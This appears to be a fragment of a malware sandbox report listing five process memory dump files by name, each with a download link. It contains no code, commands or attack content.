memory/2012-93-0x0000000000000000-mapping.dmp

Download
memory/2012-418-0x0000000000000000-mapping.dmp

Download
memory/2016-101-0x0000000000000000-mapping.dmp

Download
memory/2032-86-0x0000000000000000-mapping.dmp

Download
memory/2044-70-0x0000000000000000-mapping.dmp

Download